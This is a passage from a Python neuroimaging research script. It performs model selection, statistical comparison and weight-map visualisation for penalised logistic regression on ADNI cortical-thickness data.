data_fold.ix[data_fold[score].argmax()][arg], data_fold[score].max()])\n return pd.DataFrame(arg_max_byfold, columns=[groupby, arg, score])\n\n print('## Refit scores')\n print('## ------------')\n byparams = groupby_paths([p for p in paths if p.count(\"refit\")], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.iteritems()}\n data = [byparams_scores[k].values() for k in byparams_scores]\n\n columns = byparams_scores[byparams_scores.keys()[0]].keys()\n scores_refit = pd.DataFrame(data, columns=columns)\n\n print('## doublecv scores by outer-cv and by params')\n print('## -----------------------------------------')\n data = list()\n bycv = groupby_paths([p for p in paths if p.count(\"cvnested\")], 1)\n for fold, paths_fold in bycv.iteritems():\n print(fold)\n byparams = groupby_paths([p for p in paths_fold], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.iteritems()}\n data += [[fold] + byparams_scores[k].values() for k in byparams_scores]\n\n scores_dcv_byparams = pd.DataFrame(data, columns=[\"fold\"] + columns)\n byparams_scores_refit = byparams_scores\n\n # # rm small l1 with large tv & large l1 with small tv\n # rm = \\\n # (close(scores_dcv_byparams.l1_ratio, 0.1) & close(scores_dcv_byparams.tv, 0.8)) |\\\n # (close(scores_dcv_byparams.l1_ratio, 0.9) & close(scores_dcv_byparams.tv, 0.2))\n # np.sum(rm)\n # scores_dcv_byparams = scores_dcv_byparams[np.logical_not(rm)]\n\n # model selection on nested cv for 8 cases\n l2 = scores_dcv_byparams[(scores_dcv_byparams.l1 == 0) & (scores_dcv_byparams.tv == 0)]\n l2tv = scores_dcv_byparams[(scores_dcv_byparams.l1 == 0) & (scores_dcv_byparams.tv != 0)]\n l1l2 = scores_dcv_byparams[(scores_dcv_byparams.l1 != 0) & (scores_dcv_byparams.tv == 0)]\n l1l2tv = scores_dcv_byparams[(scores_dcv_byparams.l1 != 0) & (scores_dcv_byparams.tv != 0)]\n # large ans small l1\n l1l2_ll1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.9) & (scores_dcv_byparams.tv == 0)]\n l1l2tv_ll1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.9) & (scores_dcv_byparams.tv != 0)]\n l1l2_sl1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.1) & (scores_dcv_byparams.tv == 0)]\n l1l2tv_sl1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.1) & (scores_dcv_byparams.tv != 0)]\n\n print('## Model selection')\n print('## ---------------')\n l2 = argmaxscore_bygroup(l2); l2[\"method\"] = \"l2\"\n l2tv = argmaxscore_bygroup(l2tv); l2tv[\"method\"] = \"l2tv\"\n l1l2 = argmaxscore_bygroup(l1l2); l1l2[\"method\"] = \"l1l2\"\n l1l2tv = argmaxscore_bygroup(l1l2tv); l1l2tv[\"method\"] = \"l1l2tv\"\n\n l1l2_ll1 = argmaxscore_bygroup(l1l2_ll1); l1l2_ll1[\"method\"] = \"l1l2_ll1\"\n l1l2tv_ll1 = argmaxscore_bygroup(l1l2tv_ll1); l1l2tv_ll1[\"method\"] = \"l1l2tv_ll1\"\n l1l2_sl1 = argmaxscore_bygroup(l1l2_sl1); l1l2_sl1[\"method\"] = \"l1l2_sl1\"\n l1l2tv_sl1 = argmaxscore_bygroup(l1l2tv_sl1); l1l2tv_sl1[\"method\"] = \"l1l2tv_sl1\"\n\n scores_argmax_byfold = pd.concat([l2, l2tv, l1l2, l1l2tv, l1l2_ll1, l1l2tv_ll1, l1l2_sl1, l1l2tv_sl1])\n\n print('## Apply best model on refited')\n print('## ---------------------------')\n scores_l2 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l2.iterrows()], config)\n scores_l2tv = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l2tv.iterrows()], config)\n scores_l1l2 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2.iterrows()], config)\n scores_l1l2tv = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv.iterrows()], config)\n\n scores_l1l2_ll1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_ll1.iterrows()], config)\n scores_l1l2tv_ll1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_ll1.iterrows()], config)\n\n scores_l1l2_sl1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_sl1.iterrows()], config)\n scores_l1l2tv_sl1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_sl1.iterrows()], config)\n\n scores_cv = pd.DataFrame([[\"l2\"] + scores_l2.values(),\n [\"l2tv\"] + scores_l2tv.values(),\n [\"l1l2\"] + scores_l1l2.values(),\n [\"l1l2tv\"] + scores_l1l2tv.values(),\n\n [\"l1l2_ll1\"] + scores_l1l2_ll1.values(),\n [\"l1l2tv_ll1\"] + scores_l1l2tv_ll1.values(),\n\n [\"l1l2_sl1\"] + scores_l1l2_sl1.values(),\n [\"l1l2tv_sl1\"] + scores_l1l2tv_sl1.values()], columns=[\"method\"] + scores_l2.keys())\n\n with pd.ExcelWriter(results_filenane()) as writer:\n scores_refit.to_excel(writer, sheet_name='scores_refit', index=False)\n scores_dcv_byparams.to_excel(writer, sheet_name='scores_dcv_byparams', index=False)\n scores_argmax_byfold.to_excel(writer, sheet_name='scores_argmax_byfold', index=False)\n scores_cv.to_excel(writer, sheet_name='scores_cv', index=False)\n\n###############################################################################\ndef compare_models_2015():\n import os, glob, pandas as pd\n from brainomics.stats import mcnemar_test_classification\n os.chdir(os.path.dirname(config_filename()))\n scores_argmax_byfold = pd.read_excel(results_filenane(), sheetname='scores_argmax_byfold')\n config = json.load(open(config_filename()))\n\n ## Comparison: tv vs notv on non-smoothed data\n ## --------------------------------------------\n l1l2tv_sl1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2tv_sl1\"]\n l1l2_sl1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2_sl1\"]\n scores_l1l2tv_sl1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_sl1.iterrows()],\n config=config, ret_y=True)\n scores_l1l2_sl1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_sl1.iterrows()],\n config=config, ret_y=True)\n assert np.all(scores_l1l2tv_sl1[\"y_true\"] == scores_l1l2_sl1[\"y_true\"])\n l1l2tv_sl1_pval = mcnemar_test_classification(y_true=scores_l1l2tv_sl1[\"y_true\"], y_pred1=scores_l1l2tv_sl1[\"y_pred\"], y_pred2=scores_l1l2_sl1[\"y_pred\"], cont_table=False)\n\n l1l2tv_ll1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2tv_ll1\"]\n l1l2_ll1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2_ll1\"]\n scores_l1l2tv_ll1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_ll1.iterrows()],\n config=config, ret_y=True)\n scores_l1l2_ll1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_ll1.iterrows()],\n config=config, ret_y=True)\n assert np.all(scores_l1l2tv_ll1[\"y_true\"] == scores_l1l2_ll1[\"y_true\"])\n l1l2tv_ll1_pval = mcnemar_test_classification(y_true=scores_l1l2tv_ll1[\"y_true\"], y_pred1=scores_l1l2tv_ll1[\"y_pred\"], y_pred2=scores_l1l2_ll1[\"y_pred\"], cont_table=False)\n\n comp_pred = pd.DataFrame([[\"l1l2(no vs tv)ll1\", l1l2tv_ll1_pval],\n [\"l1l2(no vs tv)sl1\", l1l2tv_sl1_pval]], columns=[\"comparison\", \"mcnemar_p_value\"])\n\n ## p-value assesment by permutation\n from brainomics.stats import auc_recalls_permutations_pval\n\n y_true = scores_l1l2tv_ll1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_ll1[\"y_pred\"], scores_l1l2_ll1[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_ll1[\"prob_pred\"], scores_l1l2_ll1[\"prob_pred\"]\n ll1_auc_pval, ll1_r_mean_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred1, prob_pred2, nperms=10000)\n\n y_true = scores_l1l2tv_sl1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_sl1[\"y_pred\"], scores_l1l2_sl1[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_sl1[\"prob_pred\"], scores_l1l2_sl1[\"prob_pred\"]\n sl1_auc_pval, sl1_r_mean_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred2, prob_pred2, nperms=10000)\n\n comp_pred[\"recall_mean_perm_pval\"] = [ll1_r_mean_pval, sl1_r_mean_pval]\n comp_pred[\"auc_perm_pval\"] = [ll1_auc_pval, sl1_auc_pval]\n\n ## Compare weights map stability\n # mean correlaction\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n ll1_beta_r_mean = np.mean(scores1 - scores2)\n ll1_beta_r_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n sl1_beta_r_mean = np.mean(scores1 - scores2)\n sl1_beta_r_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred[\"beta_r_mean_diff\"] = [ll1_beta_r_mean, sl1_beta_r_mean]\n comp_pred[\"beta_r_perm_pval\"] = [ll1_beta_r_pval, sl1_beta_r_pval]\n\n # mean dice\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n ll1_beta_dice_mean = np.mean(scores1 - scores2)\n ll1_beta_dice_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n sl1_beta_dice_mean = np.mean(scores1 - scores2)\n sl1_beta_dice_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred[\"beta_dice_mean_diff\"] = [ll1_beta_dice_mean, sl1_beta_dice_mean]\n comp_pred[\"beta_dice_perm_pval\"] = [ll1_beta_dice_pval, sl1_beta_dice_pval]\n\n ## Comparison: tv vs notv on smoothed data\n ## ---------------------------------------\n scores_argmax_byfold_s = pd.read_excel(results_filenane_s(), sheetname='scores_argmax_byfold')\n config_s = json.load(open(config_filename_s()))\n l1l2_sl1_s = scores_argmax_byfold[scores_argmax_byfold_s.method == \"l1l2_sl1\"]\n scores_l1l2_sl1_s = scores(\"nestedcv\", paths=[os.path.join(WD_s, config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_sl1_s.iterrows()],\n config=config_s, ret_y=True)\n assert np.all(scores_l1l2tv_sl1[\"y_true\"] == scores_l1l2_sl1_s[\"y_true\"])\n l1l2tv_sl1_s_pval = mcnemar_test_classification(y_true=scores_l1l2tv_sl1[\"y_true\"], y_pred1=scores_l1l2tv_sl1[\"y_pred\"], y_pred2=scores_l1l2_sl1_s[\"y_pred\"], cont_table=False)\n #\n scores_argmax_byfold_s = pd.read_excel(results_filenane_s(), sheetname='scores_argmax_byfold')\n config_s = json.load(open(config_filename_s()))\n l1l2_ll1_s = scores_argmax_byfold[scores_argmax_byfold_s.method == \"l1l2_ll1\"]\n scores_l1l2_ll1_s = scores(\"nestedcv\", paths=[os.path.join(WD_s, config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_ll1_s.iterrows()],\n config=config_s, ret_y=True)\n assert np.all(scores_l1l2tv_ll1[\"y_true\"] == scores_l1l2_ll1_s[\"y_true\"])\n l1l2tv_ll1_s_pval = mcnemar_test_classification(y_true=scores_l1l2tv_ll1[\"y_true\"], y_pred1=scores_l1l2tv_sl1[\"y_pred\"], y_pred2=scores_l1l2_ll1_s[\"y_pred\"], cont_table=False)\n comp_pred_s = pd.DataFrame([[\"l1l2_s vs l1l2tv (ll1)\", l1l2tv_ll1_s_pval], [\"l1l2_s vs l1l2tv (sl1)\", l1l2tv_sl1_s_pval]],\n columns=[\"comparison\", \"mcnemar_p_value\"])\n\n ## p-value assesment by permutation\n y_true = scores_l1l2tv_ll1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_ll1[\"y_pred\"], scores_l1l2_ll1_s[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_ll1[\"prob_pred\"], scores_l1l2_ll1_s[\"prob_pred\"]\n ll1_auc_s_pval, ll1_r_mean_s_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred1, prob_pred2, nperms=10000)\n\n y_true = scores_l1l2tv_sl1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_sl1[\"y_pred\"], scores_l1l2_sl1_s[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_sl1[\"prob_pred\"], scores_l1l2_sl1_s[\"prob_pred\"]\n sl1_auc_s_pval, sl1_r_mean_s_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred2, prob_pred2, nperms=10000)\n\n comp_pred_s[\"recall_mean_perm_pval\"] = [ll1_r_mean_s_pval, sl1_r_mean_s_pval]\n comp_pred_s[\"auc_perm_pval\"] = [ll1_auc_s_pval, sl1_auc_s_pval]\n\n ## Compare weights map stability\n # mean correlaction\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1_s['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n ll1_beta_r_mean_s = np.mean(scores1 - scores2)\n ll1_beta_r_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1_s['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n sl1_beta_r_mean_s = np.mean(scores1 - scores2)\n sl1_beta_r_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred_s[\"beta_r_mean_diff\"] = [ll1_beta_r_mean_s, sl1_beta_r_mean_s]\n comp_pred_s[\"beta_r_perm_pval\"] = [ll1_beta_r_s_pval, sl1_beta_r_s_pval]\n\n # mean dice\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1_s['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n ll1_beta_dice_mean_s = np.mean(scores1 - scores2)\n ll1_beta_dice_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1_s['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n sl1_beta_dice_mean_s = np.mean(scores1 - scores2)\n sl1_beta_dice_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred_s[\"beta_dice_mean_diff\"] = [ll1_beta_dice_mean_s, sl1_beta_dice_mean_s]\n comp_pred_s[\"beta_dice_perm_pval\"] = [ll1_beta_dice_s_pval, sl1_beta_dice_s_pval]\n\n comp_pred = comp_pred.append(comp_pred_s)\n # End comparison with smoothed data\n\n xlsx = pd.ExcelFile(results_filenane())\n with pd.ExcelWriter(results_filenane()) as writer:\n for sheet in xlsx.sheet_names: # cp previous sheets\n xlsx.parse(sheet).to_excel(writer, sheet_name=sheet, index=False)\n comp_pred.to_excel(writer, sheet_name='comparisons', index=False)\n\n\n###############################################################################\n## vizu weight maps\ndef vizu_weight_maps_2015():\n import glob, shutil\n import brainomics.mesh_processing as mesh_utils\n\n config = json.load(open(config_filename()))\n INPUT_BASE = os.path.join(os.path.dirname(WD), \"MCIc-CTL-FS_cs\", \"5cv\", \"0\")\n OUTPUT = os.path.join(WD, \"weights_map_mesh\")\n if not os.path.exists(OUTPUT):\n os.mkdir(OUTPUT)\n\n TEMPLATE_PATH = os.path.join(WD, \"..\", \"freesurfer_template\")\n shutil.copyfile(os.path.join(TEMPLATE_PATH, \"lh.pial.gii\"), os.path.join(OUTPUT, \"lh.pial.gii\"))\n shutil.copyfile(os.path.join(TEMPLATE_PATH, \"rh.pial.gii\"), os.path.join(OUTPUT, \"rh.pial.gii\"))\n\n cor_l, tri_l = mesh_utils.mesh_arrays(os.path.join(OUTPUT, \"lh.pial.gii\"))\n cor_r, tri_r = mesh_utils.mesh_arrays(os.path.join(OUTPUT, \"rh.pial.gii\"))\n assert cor_l.shape[0] == cor_r.shape[0] == 163842\n\n cor_both, tri_both = mesh_utils.mesh_arrays(os.path.join(WD, config[\"structure\"][\"mesh\"]))\n mask__mesh = np.load(os.path.join(WD, config[\"structure\"][\"mask\"]))\n assert mask__mesh.shape[0] == cor_both.shape[0] == cor_l.shape[0] * 2 == cor_l.shape[0] + cor_r.shape[0]\n assert mask__mesh.shape[0], mask__mesh.sum() == (327684, 317089)\n\n # Find the mapping from beta in masked mesh to left_mesh and right_mesh\n # concat was initialy: cor = np.vstack([cor_l, cor_r])\n mask_left__mesh = np.arange(mask__mesh.shape[0]) < mask__mesh.shape[0] / 2\n mask_left__mesh[np.logical_not(mask__mesh)] = False\n mask_right__mesh = np.arange(mask__mesh.shape[0]) >= mask__mesh.shape[0] / 2\n mask_right__mesh[np.logical_not(mask__mesh)] = False\n assert mask__mesh.sum() == (mask_left__mesh.sum() + mask_right__mesh.sum())\n\n # the mask of the left/right emisphere within the left/right mesh\n mask_left__left_mesh = mask_left__mesh[:cor_l.shape[0]]\n mask_right__right_mesh = mask_right__mesh[cor_l.shape[0]:]\n\n # compute mask from beta (in masked mesh) to left/right\n a = np.zeros(mask__mesh.shape, int)\n a[mask_left__mesh] = 1\n a[mask_right__mesh] = 2\n mask_left__beta = a[mask__mesh] == 1 # project mesh to mesh masked\n mask_right__beta = a[mask__mesh] == 2\n assert (mask_left__beta.sum() + mask_right__beta.sum()) == mask_left__beta.shape[0] == mask_right__beta.shape[0] == mask__mesh.sum()\n assert mask_left__mesh.sum() == mask_left__beta.sum()\n assert mask_right__mesh.sum() == mask_right__beta.sum()\n\n # Check mapping from beta left part to left_mesh\n assert mask_left__beta.sum() == mask_left__left_mesh.sum()\n assert mask_right__beta.sum() == mask_right__right_mesh.sum()\n\n\n # cf /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/MCIc-CTL-FS_cs_modselectcv.xlsx sheet score_refit\n models = dict(\n l1l2tv_sl1=\"0.1_0.02_0.18_0.8_-1.0\",\n l1l2_sl1=\"0.1_0.1_0.9_0.0_-1.0\",\n l1l2tv_ll1=\"0.1_0.18_0.02_0.8_-1.0\",\n l1l2_ll1=\"0.1_0.9_0.1_0.0_-1.0\")\n\n for mod in models:\n #mod = 'l1l2tv_sl1'\n #mod = 'l1l2tv_ll1'\n #mod = 'l1l2_sl1'\n #image_arr = np.zeros(mask.get_data().shape)\n beta_map_filenames = glob.glob(os.path.dirname(INPUT_BASE)+\"/*/\"+models[mod]+\"/beta.npz\")\n\n Betas = np.vstack([array_utils.arr_threshold_from_norm2_ratio(\n np.load(filename)['arr_0'][config[\"penalty_start\"]:, :].ravel(), .99)[0]\n for filename in beta_map_filenames])\n # left\n tex = np.zeros(mask_left__left_mesh.shape)\n tex[mask_left__left_mesh] = Betas[0, mask_left__beta]\n print(mod, \"left\", np.sum(tex != 0), tex.max(), tex.min())\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_left_all.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n tex[mask_left__left_mesh] = np.sum(Betas[1:, mask_left__beta] != 0, axis=0) / float(NFOLDS_OUTER)\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_left_count5cv.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n # right\n tex = np.zeros(mask_right__right_mesh.shape)\n tex[mask_right__right_mesh] = Betas[0, mask_right__beta]\n print(mod, \"right\", np.sum(tex != 0), tex.max(), tex.min())\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_right_all.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n tex[mask_right__right_mesh] = np.sum(Betas[1:, mask_right__beta] != 0, axis=0) / float(NFOLDS_OUTER)\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_right_count5cv.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n\n count_bothhemi = np.sum(Betas[1:, :] != 0, axis=0) / float(NFOLDS_OUTER)\n supports5cv_union = count_bothhemi != 0\n print(mod, supports5cv_union.sum(), np.mean(count_bothhemi[supports5cv_union]), np.median(count_bothhemi[supports5cv_union]))\n\n\"\"\"\nl1l2tv_sl1 left 26062 0.000890264392951 -0.000987486259691\nl1l2tv_sl1 right 16390 0.0135458979138 -0.0142103149973\nl1l2tv_sl1 96107 0.434596855588 0.2\nl1l2_ll1 left 17 0.0 -0.190563935072\nl1l2_ll1 right 14 0.0 -0.132351265158\nl1l2_ll1 128 0.2328125 0.2\nl1l2_sl1 left 522 0.0247513777459 -0.0353264969457\nl1l2_sl1 right 407 0.0239399696221 -0.0310938132124\nl1l2_sl1 2966 0.28064733648 0.2\nl1l2tv_ll1 left 4070 0.0 -0.00159611730872\nl1l2tv_ll1 right 3058 0.0 -0.000938590832559\nl1l2tv_ll1 17735 0.45856216521 0.4\n\ncd /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/weights_map_mesh\n\npalette signed_value_whitecenter\nl1l2tv_sl1 -0.001 +0.001\nl1l2_sl1 -0.01 +0.01\nl1l2tv_ll1 -0.001 +0.001\nl1l2_ll1 -0.01 +0.01\n\n/neurospin/brainvisa/build/Ubuntu-14.04-x86_64/trunk/bin/bv_env /neurospin/brainvisa/build/Ubuntu-14.04-x86_64/trunk/bin/anatomist lh.pial.gii rh.pial.gii tex_*\n\nPour lh/rh.pial charger les référentiels, les afficher dans lh.pial/rh.pial\nColor / Rendering / Polygines face is clockwize\n\ncvcount\npalette signed_value_whitecenter -1, 1\n\n\ncd /home/ed203246/mega/studies/2015_logistic_nestv/figures/weights_map_mesh/snapshots_beta\nls *.png|while read input; do\nconvert $input -trim /tmp/toto.png;\nconvert /tmp/toto.png -transparent black $input;\ndone\n\ncd /home/ed203246/mega/studies/2015_logistic_nestv/figures/weights_map_mesh/snapshots_countcv\nls *.png|while read input; do\nconvert $input -trim /tmp/toto.png;\nconvert /tmp/toto.png -transparent black $input;\ndone\n\n\n\"\"\"\n\n\n###############################################################################\ndef plot_perf_2015():\n import os\n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n from matplotlib.backends.backend_pdf import PdfPages\n\n # SOME ERROR WERE HERE CORRECTED 27/04/2014 think its good\n #INPUT_vbm = \"/home/ed203246/mega/data/2015_logistic_nestv/adni/MCIc-CTL-FS/MCIc-CTL-FS_cs.csv\"\n INPUT = os.path.join(WD, \"MCIc-CTL-FS_cs_modselectcv.csv\")\n y_col = 'recall_mean'\n x_col = 'tv'\n y_col = 'auc'\n a = 0.01\n #color_map = {0.:'#D40000', 0.01: 'black', 0.1:'#F0a513', 0.5:'#2CA02C', 0.9:'#87AADE', 1.:'#214478'}\n color_map = {0.:'#D40000', 0.01:'#F0a513', 0.1:'#2CA02C', 0.5:'#87AADE', .9:'#214478', 1.: 'black'}\n # reds dark => brigth, green blues: brigth => dark\n input_filename = INPUT\n #input_filename = INPUTS[data_type][\"filename\"]\n outut_filename = input_filename.replace(\".csv\", \"_%s.pdf\" % y_col)\n #print outut_filename\n # Filter data\n data = pd.read_csv(input_filename)\n #data.l1l2_ratio = data.l1l2_ratio.round(5)\n # avoid poor rounding\n data.l1l2_ratio = np.asarray(data.l1l2_ratio).round(3)\n data.tv = np.asarray(data.tv).round(5)\n data.a = np.asarray(data.a).round(5)\n data = data[data.k == -1]\n data = data[data.l1l2_ratio.isin([0, 0.01, 0.1, 0.5, 0.9, 1.])]\n data = data[(data.tv >= 0.1) | (data.tv == 0)]\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n assert np.sum(data.l1l2_ratio == 0.01) == np.sum(close(data.l1l2_ratio, 0.01))\n #data = data[data.a <= 1]\n # for each a, l1l2_ratio, append the last point tv==1\n last = list()\n for a_ in np.unique(data.a):\n full_tv = data[(data.a == a_) & (data.tv == 1)]\n for l1l2_ratio in np.unique(data.l1l2_ratio):\n new = full_tv.copy()\n new.l1l2_ratio = l1l2_ratio\n last.append(new)\n #\n last = pd.concat(last)\n data = pd.concat([data, last])\n data.drop_duplicates(inplace=True)\n #\n from brainomics.plot_utilities import plot_lines\n figures = plot_lines(df=data,\n x_col=x_col, y_col=y_col, colorby_col='l1l2_ratio',\n splitby_col='a', color_map=color_map)\n pdf = PdfPages(outut_filename)\n for fig in figures:\n print(fig, figures[fig])\n pdf.savefig(figures[fig]); plt.clf()\n pdf.close()\n\ndef build_summary_2015():\n import pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n from collections import OrderedDict\n models = OrderedDict()\n models[\"l2\"] = (0.010,\t0.000, 1.000, 0.000)\n models[\"l2tv\"] = (0.010,\t0.000, 0.500, 0.500)\n models[\"l1\"] = (0.010,\t1.000, 0.000, 0.000)\n models[\"l1tv\"] = (0.010,\t0.500, 0.000, 0.500)\n models[\"tv\"] = (0.010,\t0.000, 0.000, 1.000)\n models[\"l1l2\"] = (0.010,\t0.500, 0.500, 0.000)\n models[\"l1l2tv\"] = (0.010,\t0.350, 0.350, 0.300)\n models[\"l1sl2\"] = (0.010,\t0.1, 0.9, 0.000)\n models[\"l1sl2tv\"] = (0.010,\t0.1 * (1-.3), 0.9*(1-.3), 0.300)\n\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n orig_cv = pd.read_csv(config['reduce_output'])\n cv = orig_cv[[\"k\", \"a\", \"l1\", \"l2\", \"tv\", 'recall_0', u'recall_1', u'recall_mean',\n 'auc', \"beta_r_bar\", 'beta_fleiss_kappa']]\n summary = list()\n for k in models:\n #k = \"l2\" k=\"l1sl2\"\n a, l1, l2, tv = models[k]\n l = cv[(cv.k == -1) & close(cv.a, a) & close(cv.l1, l1) & close(cv.l2, l2) & close(cv.tv, tv)]\n assert l.shape[0] == 1\n l[\"algo\"] = k\n summary.append(l)\n summary = pd.concat(summary)\n summary.drop(\"k\", 1, inplace=True)\n cols_diff_in = [\"recall_mean\", \"auc\", \"beta_r_bar\", \"beta_fleiss_kappa\"]\n cols_diff = [\"delta_\"+ c for c in cols_diff_in]\n for c in cols_diff:\n summary[c] = None\n delta = summary.ix[summary.algo == \"l2tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l2tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"l1tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l1\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l1tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"l1l2tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l1l2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l1l2tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"l1sl2tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l1sl2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l1sl2tv\", cols_diff] = delta\n xlsx = 